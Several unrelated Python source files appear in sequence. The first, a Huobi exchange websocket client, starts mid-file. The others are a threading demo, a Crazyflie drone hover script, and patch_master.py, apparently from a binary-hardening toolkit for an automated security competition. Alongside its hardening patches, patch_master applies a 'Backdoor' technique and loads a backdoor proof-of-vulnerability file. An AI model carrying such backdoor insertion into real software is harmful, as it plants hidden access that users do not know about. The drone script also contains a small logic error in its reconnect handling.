ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" if 'ch' in msg: topic = msg.get('ch') self.pub_socket.send_multipart( [pickle.dumps(topic), pickle.dumps(msg)]) for h in self._handle_funcs.get(topic, []): h(msg) @staticmethod def _check_info(**kwargs): log = [] if 'period' in kwargs and kwargs['period'] not in u.PERIOD: log.append(f'<้ชŒ่ฏ>ไธๅญ˜ๅœจPeriod:{kwargs["period"]}') if 'depth' in kwargs and kwargs['depth'] not in u.DerivativesDEPTH: log.append(f'<้ชŒ่ฏ>ไธๅญ˜ๅœจDepth:{kwargs["depth"]}') if log: for l in log: logger.warning(l) return False else: return True def sub_kline(self, symbol, period, _id=''): if self._check_info(symbol=symbol, period=period): msg = {'sub': f'market.{symbol}.kline.{period}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>kline-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['sub'], _id def unsub_kline(self, symbol, period, _id=''): if 
self._check_info(symbol=symbol, period=period): msg = {'unsub': f'market.{symbol}.kline.{period}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>kline-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['unsub'], _id def sub_depth(self, symbol, depth=0, _id=''): if self._check_info(symbol=symbol, depth=depth): msg = {'sub': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>depth-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['sub'], _id def unsub_depth(self, symbol, depth=0, _id=''): if self._check_info(symbol=symbol, depth=depth): msg = { 'unsub': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id } self.send_message(msg) logger.info( f'<่ฎข้˜…>depth-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['unsub'], _id def sub_last_24h_kline(self, symbol, _id=''): msg = {'sub': f'market.{symbol}.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>Last_24h_kline-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['sub'], _id def unsub_last_24h_kline(self, symbol, _id=''): msg = { 'unsub': f'market.{symbol}.detail', 'id': _id } self.send_message(msg) logger.info( f'<่ฎข้˜…>Last_24h_kline-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['unsub'], _id def sub_tick(self, symbol, _id=''): if self._check_info(symbol=symbol): msg = {'sub': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>tick-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['sub'], _id def unsub_tick(self, symbol, _id=''): if self._check_info(symbol=symbol): msg = {'unsub': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>tick-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['unsub'], _id # ------------------------------------------------------------------------- # -------------------------่กŒๆƒ…่ฏทๆฑ‚ๅ‡ฝๆ•ฐ---------------------------------------- def req_kline(self, symbol, period, _id='', **kwargs): if self._check_info(symbol=symbol, period=period): msg = {'req': f'market.{symbol}.kline.{period}', 'id': _id} if '_from' in kwargs: _from = parser.parse(kwargs['_from']).timestamp() if isinstance( kwargs['_from'], str) else kwargs['_from'] msg.update({'from': int(_from)}) if '_to' in kwargs: _to = parser.parse(kwargs['_to']).timestamp() if isinstance( kwargs['_to'], str) else kwargs['_to'] msg.update({'to': int(_to)}) self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>kline-ๅ‘้€่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['req'], _id def req_tick(self, symbol, _id=''): msg = {'req': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>tick-ๅ‘้€่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['req'], _id # ------------------------------------------------------------------------- def after_open(self,_func): # wsๅผ€ๅฏไน‹ๅŽ้œ€่ฆๅฎŒๆˆ็š„ๅˆๅง‹ๅŒ–ๅค„็† @wraps(_func) def _callback(): try: _func() except Exception as e: logger.exception(f'afer_openๅ›ž่ฐƒๅค„็†้”™่ฏฏ{e}') self._open_callbacks.append(_callback) return _callback class _DerivativesAuthWS(BaseWebsocket): def __init__(self, host='api.hbdm.com', reconn=10, interval=3): self._protocol = 'wss://' self._host = host self._path = '/notification' self.addr = self._protocol + self._host + self._path self._threadPool = ThreadPoolExecutor(max_workers=3) self.name = f'HuoBiDerivativesAuthWS_{uuid.uuid1()}' self.sub_dict = {} # ่ฎข้˜…ๅˆ—่กจ self._handlers = [] # ๅฏนmessageๅšๅค„็†็š„ๅค„็†ๅ‡ฝๆ•ฐๆˆ–ๅค„็†็ฑป self._req_callbacks = {} 
self._handle_funcs = {} self._auth_callbacks = [] self.ctx = zmq_ctx self.pub_socket = self.ctx.socket(zmq.PUB) self.pub_socket.bind(f'inproc://{self.name}') self._active = False self._reconn = reconn self._interval = interval def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') self.auth() logger.info(f'<้‰ดๆƒ>ๅ‘{self.addr}ๅ‘่ตท้‰ดๆƒ่ฏทๆฑ‚') def on_message(self, _msg): # ้‰ดๆƒws็š„ๆถˆๆฏๅค„็† json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') op = msg['op'] if op == 'ping': pong = {'op': 'pong', 'ts': msg['ts']} self.send_message(pong) if msg.setdefault('err-code', 0) == 0: if op == 'notify': self.pub_msg(msg) elif op == 'sub': logger.info( f'<่ฎข้˜…>Topic:{msg["topic"]}่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') elif op == 'unsub': logger.info( f'<่ฎข้˜…>Topic:{msg["topic"]}ๅ–ๆถˆ่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') elif op == 'req': logger.info(f'<่ฏทๆฑ‚>Topic:{msg["topic"]}่ฏทๆฑ‚ๆ•ฐๆฎๆˆๅŠŸ #{msg["cid"]}#') OnRsp = self._req_callbacks.get(msg['topic'], []) def callbackThread(_m): for cb in OnRsp: try: cb(_m) except Exception as e: logger.error(f'<่ฏทๆฑ‚ๅ›ž่ฐƒ>{msg["topic"]}็š„ๅ›ž่ฐƒๅ‡ฝๆ•ฐ{cb.__name__}ๅผ‚ๅธธ-{e}') task = self._threadPool.submit(callbackThread, msg) # _t = Thread(target=callbackThread, args=(msg,)) # _t.setDaemon(True) # _t.start() elif op == 'auth': logger.info( f'<้‰ดๆƒ>้‰ดๆƒๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') for cb in self._auth_callbacks: cb() else: logger.error( f'<้”™่ฏฏ>{msg.get("cid")}-OP:{op} ErrTime:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} ErrCode:{msg["err-code"]} ErrMsg:{msg["err-msg"]}' ) def pub_msg(self, msg): """ๆ ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" topic = msg.get('topic') self.pub_socket.send_multipart( [pickle.dumps(topic), pickle.dumps(msg)]) for h in self._handle_funcs.get(topic, []): h(msg) def auth(self, cid:str =''): from .utils import ACCESS_KEY, SECRET_KEY, createSign timestamp = dt.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S') params = { "AccessKeyId": ACCESS_KEY, "SignatureMethod": "HmacSHA256", "SignatureVersion": "2", "Timestamp": timestamp,} signature = createSign(params, 'GET', self._host, self._path, SECRET_KEY) params['Signature'] = signature params['op'] = 'auth' params['cid'] = cid params['type'] = 'api' self.send_message(params) return 'auth', cid # def sub_accounts(self, cid:str=''): # msg = {'op': 'sub', 'cid': cid, 'topic': 'accounts'} # self.send_message(msg) # logger.info(f'<่ฎข้˜…>accouts-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid # # def unsub_accounts(self, cid:str=''): # msg = {'op': 'unsub', 'cid': cid, 'topic': 'accounts'} # self.send_message(msg) # logger.info(f'<่ฎข้˜…>accouts-ๅ‘้€่ฎข้˜…ๅ–ๆถˆ่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid def sub_orders(self, symbol='*', cid:str=''): """ :param symbol: '*'ไธบ่ฎข้˜…ๆ‰€ๆœ‰่ฎขๅ•ๅ˜ๅŒ– :param cid: :return: """ msg = {'op': 'sub', 'cid': cid, 'topic': f'orders.{symbol}'} self.send_message(msg) logger.info(f'<่ฎข้˜…>orders-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{cid}#') return msg['topic'], cid def unsub_orders(self, symbol='*', cid:str=''): """ :param symbol: '*'ไธบ่ฎข้˜…ๆ‰€ๆœ‰่ฎขๅ•ๅ˜ๅŒ– :param cid: :return: """ msg = {'op': 'unsub', 'cid': cid, 'topic': f'orders.{symbol}'} self.send_message(msg) logger.info(f'<่ฎข้˜…>orders-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{cid}#') return msg['topic'], 
cid # # ------------------------------------------------------------------------ # # ----------------------ๅธๆˆท่ฏทๆฑ‚ๅ‡ฝๆ•ฐ-------------------------------------- # def req_accounts(self, cid:str=''): # msg = {'op': 'req', 'cid': cid, 'topic': 'accounts.list'} # self.send_message(msg) # logger.info(f'<่ฏทๆฑ‚>accounts-ๅ‘้€่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid # # def req_orders(self, acc_id, symbol, states:list, # types:list=None, # start_date=None, end_date=None, # _from=None, direct=None, # size=None, cid:str=''): # states = ','.join(states) # msg = {'op': 'req', 'account-id': acc_id, 'symbol': symbol, 'states': states, 'cid': cid, # 'topic': 'orders.list'} # if types: # types = ','.join(types) # msg['types'] = types # # if start_date: # start_date = parser.parse(start_date).strftime('%Y-%m-%d') # msg['start-date'] = start_date # # if end_date: # end_date = parser.parse(end_date).strftime('%Y-%m-%d') # msg['end-date'] = end_date # # if _from: # msg['_from'] = _from # # if direct: # msg['direct'] = direct # # if size: # msg['size'] = size # # self.send_message(msg) # logger.info(f'<่ฏทๆฑ‚>orders-ๅ‘้€่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid # # def req_orders_detail(self, order_id, cid:str=''): # msg = {'op': 'req', 'order-id': order_id, 'cid': cid, 'topic': 'orders.detail'} # self.send_message(msg) # logger.info(f'<่ฏทๆฑ‚>accounts-ๅ‘้€่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid def after_auth(self,_func): # wsๅผ€ๅฏไน‹ๅŽ้œ€่ฆๅฎŒๆˆ็š„ๅˆๅง‹ๅŒ–ๅค„็† @wraps(_func) def _callback(): try: _func() except Exception as e: logger.exception(f'afer_openๅ›ž่ฐƒๅค„็†้”™่ฏฏ{e}') self._auth_callbacks.append(_callback) return _callback
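A short usage sketch for the market-data class defined above (_HBWS): attach a handle_func to one topic and subscribe once the connection is open. The 'btcusdt' symbol and '1min' period are illustrative values and must be accepted by utils.PERIOD; resubscription on reconnect is already handled by on_open replaying sub_dict.

import time

hb = _HBWS()                                      # market data endpoint wss://api.huobi.br.com/ws

@hb.register_handle_func('market.btcusdt.kline.1min')
def on_kline(msg):
    # called for every pushed message on this topic
    print(msg['ch'], msg['tick']['close'])

@hb.after_open
def subscribe():
    # runs right after the websocket opens
    hb.sub_kline('btcusdt', '1min')

hb.run()
time.sleep(30)
hb.stop()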
enumerate-thread.py
from time import sleep, perf_counter
from threading import Thread, enumerate

start = perf_counter()


def show(name):
    print(f'Starting {name} ...')
    print(enumerate())
    sleep(3)
    print(f'Finishing {name} ...')


t1 = Thread(target=show, args=('One',), name='First')
t2 = Thread(target=show, args=('Two',), name='Second')

t1.start()
t2.start()

t1.join()
t2.join()

end = perf_counter()
print(round(end - start))
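This example shadows the builtin enumerate() by importing threading.enumerate directly. An equivalent variant, added here for illustration, keeps the qualified name and prints only the live thread names; total runtime stays around three seconds because both workers sleep concurrently.

import threading
from time import sleep, perf_counter

def show(name):
    print(f'Starting {name} ...')
    print([t.name for t in threading.enumerate()])   # e.g. ['MainThread', 'First', 'Second']
    sleep(3)
    print(f'Finishing {name} ...')

start = perf_counter()
threads = [threading.Thread(target=show, args=(n,), name=label)
           for n, label in (('One', 'First'), ('Two', 'Second'))]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(round(perf_counter() - start))               # ~3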
hover.py
# When I wrote this, only God and I understood what I was doing # Now, God only knows import time, sys from threading import Thread #FIXME: Has to be launched from within the example folder sys.path.append("/home/jonathan/Programs/crazyflie/cfclient-2014.01.0/lib") import cflib from cflib.crazyflie import Crazyflie from controller import SampleListener import logging logging.basicConfig(level=logging.ERROR) class Hover: def __init__(self, link_uri, control_listener, config=None): """ Initialize and run the example with the specified link_uri """ self._config = config self._cf = Crazyflie() self._control_listener = control_listener self._cf.connected.add_callback(self._connected) self._cf.disconnected.add_callback(self._disconnected) self._cf.connection_failed.add_callback(self._connection_failed) self._cf.connection_lost.add_callback(self._connection_lost) self._cf.open_link(link_uri) print "Connecting to %s" % link_uri def _connected(self, link_uri): print "Connected to %s" % link_uri Thread(target=self._hover_this_shit).start() # self._hover_this_shit() def _disconnected(self, link_uri): print "disconnected from %s" % link_uri def _connection_failed(self, link_uri, msg): print "Connection to %s failed: %s" % (link_uri, msg) if not self._config: if "reconnect" in self._config: print "Attempting reconnect.." if self._config["reconnect"]: self._cf.open_link(link_uri) else: sys.exit(2) def _connection_lost(self, link_uri, msg): print "Connection to %s lost: %s" % (link_uri, msg) if "reconnect" in self._config: print "Attempting reconnect.." if self._config["reconnect"]: self._cf.open_link(link_uri) else: sys.exit(3) # def _hover_this_shit(self): # print "Hovering this shit" # thrust_mult = 1.5 # thrust_step = 500 # thrust = 20000 # pitch = -6 # roll = -2 # yawrate = 0 # while thrust >= 20000: # self._cf.commander.send_setpoint(roll, pitch, yawrate, thrust) # time.sleep(0.1) # if thrust >=47000: # thrust_mult = -1 # thrust += thrust_step * thrust_mult # self._cf.commander.send_setpoint(0, 0, 0, 0) # # Make sure that the last packet leaves before the link is closed # # since the message queue is not flushed before closing # time.sleep(0.1) # self._cf.close_link() def _hover_this_shit(self): print "Hovering this shit" # try: while True: print "asdasd %s %s %s %d" % ( int(self._control_listener.roll()*10), int(self._control_listener.pitch()*10), int(self._control_listener.yaw()*100), int(self._control_listener.y() * 47000)) self._cf.commander.send_setpoint( int(self._control_listener.roll()*10), int(self._control_listener.pitch()*10), int(self._control_listener.yaw()*100), int(self._control_listener.y() * 47000)) # self._cf.commander.send_setpoint( # 0, # 0, # 0, # int(self._control_listener.y() * 47000)) time.sleep(0.1) # except (KeyboardInterrupt): # self._cf.commander.send_setpoint(0, 0, 0, 0) # self._cf.close_link() # exit
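The active loop above streams setpoints derived from the external control listener at roughly 10 Hz and never clamps the thrust it computes. Below is a distilled sketch of that loop, assuming the same Crazyflie (`cf`) and SampleListener (`listener`) objects this file constructs; the thrust clamp, the duration argument, and the final zero setpoint (borrowed from the commented-out ramp code) are illustrative hardening, not part of the original behaviour.

import time

def fly(cf, listener, duration=10.0, max_thrust=47000):
    # stream setpoints at ~10 Hz, clamp thrust, always cut motors at the end
    end = time.time() + duration
    try:
        while time.time() < end:
            thrust = max(0, min(int(listener.y() * max_thrust), max_thrust))
            cf.commander.send_setpoint(int(listener.roll() * 10),
                                       int(listener.pitch() * 10),
                                       int(listener.yaw() * 100),
                                       thrust)
            time.sleep(0.1)
    finally:
        cf.commander.send_setpoint(0, 0, 0, 0)     # zero setpoint before closing
        time.sleep(0.1)                            # let the last packet leave the link
        cf.close_link()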
patch_master.py
#!/usr/bin/env python import sys import os import logging import resource import traceback import timeout_decorator import itertools import psutil import multiprocessing import subprocess import random import concurrent.futures import datetime import tempfile import termcolor import traceback import time import cPickle as pickle from ctypes import cdll from cStringIO import StringIO from collections import OrderedDict from patcherex.techniques.qemudetection import QemuDetection from patcherex.techniques.shadowstack import ShadowStack from patcherex.techniques.packer import Packer from patcherex.techniques.simplecfi import SimpleCFI from patcherex.techniques.cpuid import CpuId from patcherex.techniques.randomsyscallloop import RandomSyscallLoop from patcherex.techniques.stackretencryption import StackRetEncryption from patcherex.techniques.indirectcfi import IndirectCFI from patcherex.techniques.transmitprotection import TransmitProtection from patcherex.techniques.shiftstack import ShiftStack from patcherex.techniques.nxstack import NxStack from patcherex.techniques.adversarial import Adversarial from patcherex.techniques.backdoor import Backdoor from patcherex.techniques.bitflip import Bitflip from patcherex.techniques.binary_optimization import optimize_it from patcherex.techniques.uninitialized_patcher import UninitializedPatcher from patcherex.techniques.malloc_ext_patcher import MallocExtPatcher from patcherex.techniques.noflagprintf import NoFlagPrintfPatcher from patcherex.techniques.fidgetpatches import fidget_it from patcherex.errors import * from patcherex.backends.detourbackend import DetourBackend from patcherex.backends.reassembler_backend import ReassemblerBackend from patcherex.patches import * from networkrules import NetworkRules l = logging.getLogger("patcherex.PatchMaster") def get_backdoorpov(): self_location_folder = os.path.dirname(os.path.realpath(__file__)) backdoorpov_fname = os.path.join(self_location_folder,"../backdoor_stuff/backdoor_pov.pov") with open(backdoorpov_fname) as fp: content = fp.read() return content def test_bin_with_qemu(original,patched_blob,bitflip=False): import shellphish_qemu import subprocess32 def try_bin_with_input(path,tinput,seed=123): pipe = subprocess32.PIPE qemu_location = shellphish_qemu.qemu_path('cgc-nxtracer') main_args = [qemu_location,"-seed",str(seed)] if bitflip: used_args = main_args + ["-bitflip"] else: used_args = main_args final_args = used_args + [os.path.realpath(path)] print " ".join(final_args) p = subprocess32.Popen(final_args, stdin=pipe, stdout=pipe, stderr=pipe, preexec_fn=process_killer) status = "ok" try: try: stdout,stderr = p.communicate(tinput,timeout=10) print stdout print stderr print p.returncode except OSError: print "OSError" # I have seen: "OSError: [Errno 32] Broken pipe" # likely because the process dies before it reads all the input # I just "pass", the code later on will check if it is a crash or normal exit if p.returncode == None: # returncode == None means the process is still running # this means the process did not terminate # I am not even sure this is possible, but I am going to terminate it to be sure p.terminate() p.wait() # either communicate has finished or I called terminate, so wait will not stall # 46 is the special error code value used in cgc-nxtracer used to indicate # execution attempt of not executable memory if p.returncode < 0 or p.returncode == 46: status = "crash" except subprocess32.TimeoutExpired: print "Timeout" status = "halt" p.terminate() p.wait() print status return 
status patched = tempfile.mktemp() with open(patched,'wb') as fp: fp.write(patched_blob) os.chmod(patched, 0755) # given challenge_binary_node.py the original file is executable # check file size, if it more than 200% (equivalent to 125% speed/memory overhead) we do not even try to submit # this should really never happen even when we do not remove the pdf, # the biggest increase of file size I have seen was 121% osize = os.path.getsize(original) psize = os.path.getsize(patched) size_overhead = (psize/float(osize))*100.0 print "size_overhead", size_overhead if size_overhead > 200.0: raise SizeError(str(psize) + " vs " + str(osize)) inputs = ["","B","\n","\x00","1\n \x00"*10,"\xff\x80"+"".join([chr(i) for i in xrange(2,200,6)])] success_tests = [] for i,tinput in enumerate(inputs): tseed = 1000+i test_result = try_bin_with_input(original,tinput,tseed) if test_result == "ok": success_tests.append((tinput,tseed)) for success_input,tseed in success_tests: test_result = try_bin_with_input(patched,success_input,tseed) if test_result != "ok": os.unlink(patched) raise FunctionalityError("input ->"+success_input.encode('hex')+"<-") os.unlink(patched) class PatchMaster(): def __init__(self,infile): self.infile = infile def generate_stackretencryption_binary(self, test_bin=None): backend = ReassemblerBackend(self.infile) patches = [] patches.extend(StackRetEncryption(self.infile, backend).get_patches()) backend.apply_patches(patches) final_content = backend.get_final_content() return (final_content, "") def generate_fidget_bitflip_binary(self): nr = NetworkRules() midfile = self.infile + '.fidget' + str(random.randrange(0,1000)) fidget_it(self.infile, midfile) backend = DetourBackend(midfile) cp = Bitflip(midfile,backend) patches1 = cp.get_patches() backend.apply_patches(patches1) return (backend.get_final_content(),nr.get_bitflip_rule()) ################## def generate_medium_reassembler_optimized_binary(self,test_bin=True): try: intermediate = tempfile.mktemp(prefix='%s_' % os.path.basename(self.infile)) optimize_it(self.infile, intermediate) nr = NetworkRules() backend = ReassemblerBackend(intermediate) patches = [] patches.extend(IndirectCFI(intermediate,backend).get_patches()) patches.extend(TransmitProtection(intermediate,backend).get_patches()) patches.extend(ShiftStack(intermediate,backend).get_patches()) patches.extend(Adversarial(intermediate,backend).get_patches()) patches.extend(Backdoor(intermediate,backend).get_patches()) # patches.extend(NxStack(intermediate,backend).get_patches()) patches.extend(MallocExtPatcher(intermediate,backend).get_patches()) patches.extend(StackRetEncryption(intermediate,backend).get_patches()) patches.extend(UninitializedPatcher(intermediate,backend).get_patches()) patches.extend(NoFlagPrintfPatcher(intermediate, backend).get_patches()) backend.apply_patches(patches) final_content = backend.get_final_content() if test_bin: test_bin_with_qemu(self.infile,final_content) res = (final_content,"") except PatcherexError, e: traceback.print_exc(e) res = (None,None) return res def generate_medium_reassembler_binary(self,test_bin=True): try: nr = NetworkRules() backend = ReassemblerBackend(self.infile) patches = [] patches.extend(IndirectCFI(self.infile,backend).get_patches()) patches.extend(TransmitProtection(self.infile,backend).get_patches()) patches.extend(ShiftStack(self.infile,backend).get_patches()) patches.extend(Adversarial(self.infile,backend).get_patches()) patches.extend(Backdoor(self.infile,backend).get_patches()) # 
patches.extend(NxStack(self.infile,backend).get_patches()) patches.extend(MallocExtPatcher(self.infile,backend).get_patches()) patches.extend(StackRetEncryption(self.infile,backend).get_patches()) patches.extend(UninitializedPatcher(self.infile,backend).get_patches()) patches.extend(NoFlagPrintfPatcher(self.infile, backend).get_patches()) backend.apply_patches(patches) final_content = backend.get_final_content() if test_bin: test_bin_with_qemu(self.infile,final_content) res = (final_content,"") except PatcherexError, e: traceback.print_exc(e) res = (None,None) return res def generate_medium_detour_binary(self,test_bin=True): try: nr = NetworkRules() backend = DetourBackend(self.infile) patches = [] patches.extend(IndirectCFI(self.infile,backend).get_patches()) patches.extend(TransmitProtection(self.infile,backend).get_patches()) patches.extend(ShiftStack(self.infile,backend).get_patches()) patches.extend(Adversarial(self.infile,backend).get_patches()) patches.extend(Backdoor(self.infile,backend).get_patches()) # patches.extend(NxStack(self.infile,backend).get_patches()) patches.extend(MallocExtPatcher(self.infile,backend).get_patches()) patches.extend(StackRetEncryption(self.infile,backend).get_patches()) patches.extend(UninitializedPatcher(self.infile,backend).get_patches()) patches.extend(NoFlagPrintfPatcher(self.infile, backend).get_patches()) backend.apply_patches(patches) final_content = backend.get_final_content() if test_bin: test_bin_with_qemu(self.infile,final_content) res = (final_content,"") except PatcherexError, e: traceback.print_exc(e) res = (None,None) return res ######################## def create_one_patch(self,patch_type): m = getattr(self,"generate_"+patch_type+"_binary") patch, network_rule = m(test_bin=True) return patch, network_rule def process_killer(): cdll['libc.so.6'].prctl(1,9) def shellquote(s): return "'" + s.replace("'", "'\\''") + "'" def exec_cmd(args,cwd=None,shell=False,debug=False,pkill=True): #debug = True if debug: print "EXECUTING:",repr(args),cwd,shell pipe = subprocess.PIPE preexec_fn = None if pkill: preexec_fn = process_killer p = subprocess.Popen(args,cwd=cwd,shell=shell,stdout=pipe,stderr=pipe,preexec_fn=process_killer) std = p.communicate() retcode = p.poll() res = (std[0],std[1],retcode) if debug: print "RESULT:",repr(res) return res def worker(inq,outq,filename_with_technique=True,timeout=60*3,test_results=True): def delete_if_exists(fname): try: os.unlink(fname) except OSError: pass process_killer() while True: input_file,technique,output_dir = inq.get() if filename_with_technique: output_fname = os.path.join(output_dir,os.path.basename(input_file)+"_"+technique) else: output_fname = os.path.join(output_dir,os.path.basename(input_file)) delete_if_exists(output_fname) delete_if_exists(output_fname+"_log") args = ["timeout","-s","9",str(timeout),os.path.realpath(__file__),"single",input_file,technique,output_fname] if test_results: args += ["--test"] res = exec_cmd(args) with open(output_fname+"_log","wb") as fp: fp.write("\n"+"="*30+" STDOUT\n") fp.write(res[0]) fp.write("\n"+"="*30+" STDERR\n") fp.write(res[1]) fp.write("\n"+"="*30+" RETCODE: ") fp.write(str(res[2]).strip()) fp.write("\n") if(res[2]!=0 or not os.path.exists(output_fname)): outq.put((False,(input_file,technique,output_dir),res)) else: outq.put((True,(input_file,technique,output_dir),res)) def ftodir(f,out): dname = os.path.split(os.path.split(f)[-2])[-1] res = os.path.join(out,dname) #print "-->",out,dname,res return res def ftodir2(f,technique,out): sep = os.path.sep 
cb_name, flavour = f.split(sep)[-3:-1] res = os.path.join(*[out,flavour,technique,cb_name]) return res if __name__ == "__main__": if sys.argv[1] == "run": logging.getLogger("patcherex.backends.DetourBackend").setLevel("INFO") logging.getLogger("patcherex.backend").setLevel("INFO") logging.getLogger("patcherex.techniques.NoFlagPrintfPatcher").setLevel("DEBUG") logging.getLogger("patcherex.techniques.StackRetEncryption").setLevel("DEBUG") logging.getLogger("patcherex.techniques.IndirectCFI").setLevel("DEBUG") logging.getLogger("patcherex.techniques.TransmitProtection").setLevel("DEBUG") logging.getLogger("patcherex.techniques.ShiftStack").setLevel("DEBUG") logging.getLogger("patcherex.techniques.NxStack").setLevel("DEBUG") logging.getLogger("patcherex.techniques.Adversarial").setLevel("DEBUG") logging.getLogger("patcherex.techniques.Backdoor").setLevel("DEBUG") logging.getLogger("patcherex.PatchMaster").setLevel("INFO") input_fname = sys.argv[2] out = os.path.join(sys.argv[3],os.path.basename(input_fname)) pm = PatchMaster(input_fname) res = pm.run(return_dict = True) with open(sys.argv[2]) as fp: original_content = fp.read() res["original"] = (original_content, '') for k,(v,rule) in res.iteritems(): output_fname = out+"_"+k fp = open(output_fname,"wb") fp.write(v) fp.close() os.chmod(output_fname, 0755) with open(output_fname+'.rules','wb') as rf: rf.write(rule) elif sys.argv[1] == "single": cdll['libc.so.6'].prctl(1,9) mem_limit = 16 * pow(2, 30) resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit)) print "="*50,"process started at",str(datetime.datetime.now()) start_time = time.time() print " ".join(map(shellquote,sys.argv)) logging.getLogger("patcherex.backends.DetourBackend").setLevel("INFO") logging.getLogger("patcherex.backend").setLevel("INFO") logging.getLogger("patcherex.techniques.NoFlagPrintfPatcher").setLevel("DEBUG") logging.getLogger("patcherex.techniques.StackRetEncryption").setLevel("DEBUG") logging.getLogger("patcherex.techniques.IndirectCFI").setLevel("DEBUG") logging.getLogger("patcherex.techniques.TransmitProtection").setLevel("DEBUG") logging.getLogger("patcherex.techniques.ShiftStack").setLevel("DEBUG") logging.getLogger("patcherex.techniques.NxStack").setLevel("DEBUG") logging.getLogger("patcherex.techniques.Adversarial").setLevel("DEBUG") logging.getLogger("patcherex.techniques.Backdoor").setLevel("DEBUG") logging.getLogger("patcherex.PatchMaster").setLevel("INFO") input_fname = sys.argv[2] technique = sys.argv[3] output_fname = sys.argv[4] pm = PatchMaster(input_fname) m = getattr(pm,"generate_"+technique+"_binary") if "--test" in sys.argv: res = m(test_bin = True) else: res = m(test_bin = False) # handle generate_ methods returning also a network rule bitflip = False if res[0] == None: sys.exit(33) if not any([output_fname.endswith("_"+str(i)) for i in xrange(2,10)]): fp = open(os.path.join(os.path.dirname(output_fname),"ids.rules"),"wb") fp.write(res[1]) fp.close() if "bitflip" in res[1]: bitflip = True patched_bin_content = res[0] fp = open(output_fname,"wb") fp.write(patched_bin_content) fp.close() os.chmod(output_fname, 0755) print "="*50,"process ended at",str(datetime.datetime.now()),"in",str(time.time()-start_time) elif sys.argv[1] == "multi" or sys.argv[1] == "multi_name" or sys.argv[1] == "multi_name2": out = sys.argv[2] techniques = sys.argv[3].split(",") if "--test" == sys.argv[7]: test_results = True else: test_results = False files = sys.argv[8:] technique_in_filename = True if sys.argv[1] == "multi_name": tasks = [] for f in files: for t in 
techniques: outdir = ftodir(f,out) try: os.makedirs(outdir) except OSError: pass tasks.append((f,t,outdir)) elif sys.argv[1] == "multi_name2": tasks = [] technique_in_filename = False for f in files: for t in techniques: outdir = ftodir2(f,t,out) try: os.makedirs(outdir) except OSError: pass try: os.mkdir(outdir) except OSError: pass tasks.append((f,t,outdir)) elif sys.argv[1] == "multi": tasks = [(f,t,out) for f,t in list(itertools.product(files,techniques))] print len(tasks) res_dict = {} inq = multiprocessing.Queue() outq = multiprocessing.Queue() plist = [] nprocesses = int(sys.argv[5]) if nprocesses == 0: nprocesses = int(psutil.cpu_count()*1.0) timeout = int(sys.argv[6]) for i in xrange(nprocesses): p = multiprocessing.Process(target=worker, args=(inq,outq,technique_in_filename,timeout,test_results)) p.start() plist.append(p) ntasks = len(tasks) random.shuffle(tasks,lambda : 0.1) for t in tasks: inq.put(t) for i in xrange(ntasks): res = outq.get() sep = os.path.sep key = (sep.join(res[1][0].split(sep)[-3:]),res[1][1]) status = res[0] value = res[2] if status: status = termcolor.colored(status,"green") else: status = termcolor.colored(status,"red") print "=" * 20, str(i+1)+"/"+str(ntasks), key, status #print value res_dict[key] = res for p in plist: 